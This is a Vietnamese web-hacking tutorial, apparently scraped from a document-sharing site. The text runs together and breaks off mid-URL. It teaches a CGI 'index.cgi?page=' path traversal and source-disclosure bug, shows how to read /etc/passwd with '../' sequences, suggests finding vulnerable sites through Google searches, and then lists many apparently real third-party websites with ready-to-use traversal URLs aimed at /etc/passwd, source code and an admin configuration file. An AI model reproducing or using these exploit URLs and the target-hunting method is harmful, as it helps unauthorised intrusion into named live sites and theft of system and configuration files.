Web Hacking, Brief Introduction

Trong thời đại hiện nay khi internet được phổ biến rộng rãi, các tổ chức, cá nhân đều có nhu cầu giới thiệu thông tin của mình trên xa lộ thông tin cũng như thực hiện các cuộc giao dịch buôn bán online. Vấn đề nảy sinh là khi phạm vi ứng dụng của các web application ngày càng phổ biến thì khả năng xuất hiện lỗi và bị tấn công càng cao. Trong các lĩnh vực hacking, hack web application là sân chơi khá lý thú cho những ai yêu thích computer security. ...
Nội dung trích xuất từ tài liệu:
Web Hacking, Brief IntroductionWeb Hacking, Brief Introduction :Trong thời đại hiện nay khi internet được phổ biến rộng rãi, các tổ chức, cá nhân đều cónhu cầu giới thiệu thông tin của mình trên xa lộ thông tin cũng nh ư thực hiện các cuộcgiao dịch buôn bán online. Vấn đề nảy sinh là khi phạm vi ứng dụng của các webapplication ngày càng phổ biến thì khả năng xuất hiện lỗi và bị tấn công càng cao. Trongcác lĩnh vực hacking, hack web application là sân chơi khá lý thú cho những ai yêu thíchcomputer security.Thông thường, những bước cơ bản khi thực hiện hack web bao gồm như sau - các bướcnày không nhất thiết phải thực hiện tuần tự mà tùy vào điều kiện của chúng ta.1. Thu thập thông tin ở mức trên về hạ tầng của mục tiêuBước này ta cần thu thập một số thông tin quan trọng như có bao nhiêu server, mô hìnhcủa các web server, các client nào sẽ tương tác với ứng dụng web, kiểu giao tiếp thôngtin (transport) và thông qua các cổng (port) nào, những site liên quan đến việc thực hiệnchức năng của site mục tiêu....2. Khảo sát ứng dụng webỞ đây tôi ch ỉ mô tả một trong những phương pháp khảo sát khá phổ biến từ trước đếngiờ, đó là Xem mã nguồn và lợi dụng các lỗi cho phép xem mã nguồn.Một số ngôn ngữweb thông dụng hiện nay có nhiều lỗi này như Active S erver Pages (ASP),CommonGateway Interface (CGI), ColdFusion Server (CFM), Hypertext Preprocessor (PHP).Bài viết này tôi chỉ đề cập đến 1 bug đã có từ lâu nhưng thấy vẫn còn nhiều site mắcphải, đó là lỗi liên quan đến CGI design cho phép view source và file system traversal.Hãy xem ví dụ sau:http://www.earthdayalliance.org/index.cgi?page=contact.htmỞ đây index.cgi được gọi với tham số truyền vào là trang contact.htm (HTML file) nó sẽđọc và hiện nội dung của trang này lên client browser. Tuy nhiên nếu người viết cgikhông kiểm tra kĩ lưỡng, ta có thể lợi dụng để xem chính nội dung của file index.cgi haycác trang khác. Ví dụ sau ta sẽ thay contact.htm bằng index.cgi:http://www.earthdayalliance.org/index.cgi?page=index.cgiỞ đây ta gặp 1 thông báo lỗi error: No such file or directory/web/guide/earthdayalliance/www/content/index.cgi, nguyên nhân là th ực tế index.cgikhông nằm trong thư mục hiện hành (tức là ../www/content/) mà nằm ở www, do đó tasẽ chỉnh lại link 1 chút bằng 1 dot dot slash, như sau:http://www.earthdayalliance.org/index.cgi?page=/../index.cgiCh ạy link này ta sẽ thấy nội dung của index.cgi được show trên browser. Việc xem đượcsource có th ể giúp ta tìm hiểu kĩ càng hơn về web app, thậm chí nếu may mắn có thểxem được những thông tin quan trọng khác. Lệnh sau là 1 ví dụ dùng lỗi này để xem fileetc/passwd trong unix server:http://www.earthdayalliance.org/index.cgi?page=/../../../../../../../../../etc/passwdĐây chỉ là 1 ví dụ nhỏ, còn khai thác hay hạn chế thế nào thì tùy khả năng của mỗi người.Các bạn có thể tìm các site bị lỗi này bằng cách dùng www.google.com, search từ khóaliên quan, chẳng hạn như: index.cgi?page=Đây là vài link tôi tìm thấy, các bạn có thể tham khảo:http://www.discountdata.com/index.cgi?page=index.cgihttp://home.no.net/danm2/freezeware/index.cgi?page=leecher.htmlhttp://home.no.net/danm2/freezeware/index.cgi?page=/../../../../../../../../etc/passwdhttp://itf.fys.kuleuven.ac.be/workshop2002/index.cgi?page=practical.htmhttp://itf.fys.kuleuven.ac.be/workshop2002/index.cgi?page=/../../../../../../etc/passwdhttp://www.resource.nl/uk/index.cgi?page=index.cgihttp://www.earthdayalliance.org/index.cgi?page=contact.htmhttp://www.earthdayalliance.org/index.cgi?page=/../index.cgihttp://www.earthdayalliance.org/index.cgi?page=/../../../../../../../../../etc/passwdhttp://www.nestingeagles.com/index.cgi?page=videoB.htmhttp://www.nestingeagles.com/index.cgi?page=/../index.cgihttp://www.nestingeagles.com/index.cgi?page=/../../../../../../etc/passwdhttp://www.warehousejewelry.com/cgi-bin/index.cgi?page=Privacy_Policy.htmhttp://www.warehousejewelry.com/cgi-bin/index.cgi?page=/../index.cgihttp://www.warehousejewelry.com/cgi-bin/index.cgi?page=/.././admin/configuration.plhttp://www.warehousejewelry.com/cgi-bin/index.cgi?page=/../../../../../../../etc/passwdhttp://demo1.secmod.com/index.cgi?page=links.htmlhttp://demo1.secmod.com/index.cgi?page=index.cgihttp://demo1.secmod.com/index.cgi?page=/../../../../../etc/passwdhttp://www.vintagejournal.com/VJ0901/index.cgi?page=/../index.cgihttp://www.vintagejournal.com/VJ0901/index.cgi?page=home.htmhttp://www.datadart.com/commercesql/index.cgi?page=STK%20Datasheets.html&carhttp://www.datadart.com/commercesql/index.cgi?page=/../index.cgihttp://www.gatlinburggateway.com/index.cgi?&page=/../../../../../../etc/passwdhttp://www.berkshire-is.com/index.cgi?page=news.htmlhttp://www.berkshire-is.com/index.cgi?page=index.cgihttp://www.berkshire-is.com/index.cgi?page=/../../../../../etc/passwdhttp://www.smokymtnarts-crafts.com/index.cgi?page=otto.htmhttp://www.smokymtnarts-crafts.com/index.cgi?page=/../index.cgihttp://ww ...